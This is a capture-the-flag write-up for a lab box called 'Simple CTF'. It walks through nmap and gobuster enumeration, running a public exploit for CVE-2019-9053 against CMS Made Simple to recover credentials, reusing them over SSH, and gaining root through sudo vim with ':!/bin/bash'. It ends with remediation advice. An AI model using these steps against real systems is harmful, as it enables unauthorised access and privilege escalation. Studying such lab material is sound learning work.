[Linux] Simple CTF

Enumeration

sudo nmap 10.10.56.128

sudo nmap -A -p 21,80 10.10.56.128

HTTP

Robots.txt

First we look at the website. The nmap scan showed the presence of a robot.txt file. We should look at what is indide.

We get these informations:

web pages: /openemr-5_0_1_3, /
name: mike

Both web pages cannot be accessed.

Directory listing

gobuster dir -u http://10.10.56.128 -w /usr/share/wordlists/dirb/common.txt

 gobuster dir -u http://10.10.56.128/simple -w /usr/share/wordlists/dirb/common.txt

We see that the website is build on a CMS called CMS Made Simple.

FTP

We can't find anythinf interesting on the ftp server. The server enter in a passive mode when we want to access list its ressources. We don't try anything further.

Exploitation

CMS made simple is vulnrable to CVE-2019-9053. We use the following exploit to abuse the service: CVE-2019-9053.

python3 exploit.py -u http://10.10.56.128/simple/ -c -w /usr/share/dirb/wordlists/others/best110.txt

We got:

a username: mitch
an email: admin@admin.com
a password: secret

We get access to the admin administration page on the website.

SSH

We stayed at this stage until we did another enumeration phase on the remaing port (2222). Bingo! an SSH service runs at this port:

sudo nmap -A -p 2222 10.10.56.128

We can try the credentials on the ssh service.

ssh -p 2222 mitch@10.10.56.128

Privilege Escalation

sudo -l

We can explore GTFOBins to see how we can elevate our privilege on the system as we are allowed to run vim command as root.

sudo vim ~/user.txt

ESCHAP
:!/bin/bash

Remediation

Don't use vulnerable CMS: make application update.
Don't reuse password.
Use strong password.
Deactivate password based authentication on SSH.
Sudo right should be checked carefully.

Previous[Linux] Bounty Hacker Next[Linux] Basic Pentesting

Last updated 1 year ago

hashtagEnumeration

hashtagHTTP

hashtagRobots.txt

hashtagDirectory listing

hashtagFTP

hashtagExploitation

hashtagSSH

hashtagPrivilege Escalation

hashtagRemediation